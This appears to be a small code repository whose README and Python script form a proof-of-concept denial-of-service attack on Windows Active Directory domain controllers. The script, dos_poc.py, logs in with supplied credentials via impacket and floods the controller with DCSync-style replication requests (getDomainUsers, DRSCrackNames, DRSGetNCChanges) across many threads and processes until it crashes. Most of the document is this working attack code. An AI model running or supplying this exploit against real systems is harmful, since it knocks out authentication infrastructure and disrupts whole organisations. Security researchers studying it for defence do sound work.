├── .gitignore ├── LICENSE ├── README.md └── dos_poc.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # windows_ad_dos_poc 2 | PoC code for crashing windows active directory 3 | -------------------------------------------------------------------------------- /dos_poc.py: -------------------------------------------------------------------------------- 1 | import threading 2 | import multiprocessing 3 | import traceback 4 | import time 5 | import random 6 | 7 | 8 | from impacket.smbconnection import SMBConnection 9 | from impacket.examples.secretsdump import RemoteOperations 10 | from impacket.nt_errors import STATUS_MORE_ENTRIES 11 | from impacket.dcerpc.v5 import drsuapi 12 | 13 | 14 | 15 | class DRSUAPIOps: 16 | def __init__(self, target, username, password): 17 | self.target = target 18 | self.username = username 19 | self.password = password 20 | 21 | 22 | def run(self): 23 | while True: 24 | try: 25 | self.__smbConnection = SMBConnection(remoteName = self.target, remoteHost = self.target) 26 | self.__smbConnection.login(self.username, self.password) 27 | 28 | self.__remoteOps = RemoteOperations(self.__smbConnection, False, None) 29 | enumerationContext = 0 30 | status = STATUS_MORE_ENTRIES 31 | while status == STATUS_MORE_ENTRIES: 32 | resp = self.__remoteOps.getDomainUsers(enumerationContext) 33 | 34 | for user in resp['Buffer']['Buffer']: 35 | userName = user['Name'] 36 | #print('userName : %s' % userName) 37 | 38 | userSid = self.__remoteOps.ridToSid(user['RelativeId']) 39 | crackedName = self.__remoteOps.DRSCrackNames(drsuapi.DS_NAME_FORMAT.DS_SID_OR_SID_HISTORY_NAME, 40 | drsuapi.DS_NAME_FORMAT.DS_UNIQUE_ID_NAME, 41 | name=userSid.formatCanonical()) 42 | 43 | if crackedName['pmsgOut']['V1']['pResult']['cItems'] == 1: 44 | if crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['status'] != 0: 45 | break 46 | userRecord = self.__remoteOps.DRSGetNCChanges(crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['pName'][:-1]) 47 | # userRecord.dump() 48 | replyVersion = 'V%d' % userRecord['pdwOutVersion'] 49 | 50 | enumerationContext = resp['EnumerationContext'] 51 | status = resp['ErrorCode'] 52 | except Exception as e: 53 | if str(e).find('STATUS_PIPE_NOT_AVAILABLE') != -1: 54 | continue 55 | elif str(e).find('STATUS_PIPE_CLOSING') != -1: 56 | print('Server is restarting prolly now...') 57 | return 58 | raise e 59 | 60 | class ThreadedOps(threading.Thread): 61 | def __init__(self, target, username, password): 62 | threading.Thread.__init__(self) 63 | self.target = target 64 | self.username = username 65 | self.password = password 66 | 67 | 68 | def run(self): 69 | try: 70 | ops = DRSUAPIOps(self.target, self.username, self.password) 71 | ops.run() 72 | except Exception as e: 73 | traceback.print_exc() 74 | return 75 | 76 | class MPOps(multiprocessing.Process): 77 | def __init__(self, target, username, password, threadcount = 5): 78 | multiprocessing.Process.__init__(self) 79 | self.thread_count = threadcount 80 | self.threads = [] 81 | self.target = target 82 | self.username = username 83 | self.password = password 84 | 85 | def run(self): 86 | for i in range(self.thread_count): 87 | ops = ThreadedOps(self.target, self.username, self.password) 88 | ops.daemon = True 89 | ops.start() 90 | self.threads.append(ops) 91 | 92 | for ops in self.threads: 93 | ops.join() 94 | return 95 | 96 | 97 | def run(): 98 | import argparse 99 | parser = argparse.ArgumentParser() 100 | parser.add_argument('target', help='Target IP address') 101 | parser.add_argument('username', help='Username') 102 | parser.add_argument('password', help='Password') 103 | parser.add_argument('-t','--threadcount', type=int, default = 5, help='Thread count') 104 | parser.add_argument('-p','--processcount', type=int, default = 5, help='Process count') 105 | 106 | args = parser.parse_args() 107 | 108 | print('Starting DCSync on multiple thread/processes, this might take a while...') 109 | processes = [] 110 | for i in range(args.processcount): 111 | #mp = MPOps(args.target, args.username, args.password) 112 | mp = MPOps(args.target, args.username, args.password, threadcount = args.threadcount) 113 | mp.deamon = True 114 | mp.start() 115 | processes.append(mp) 116 | 117 | print('Sorry, no fancy memory adresses. Just crashing the DC.') 118 | 119 | for mp in processes: 120 | mp.join() 121 | 122 | print('Should have crashed by now') 123 | 124 | 125 | if __name__ == '__main__': 126 | run() --------------------------------------------------------------------------------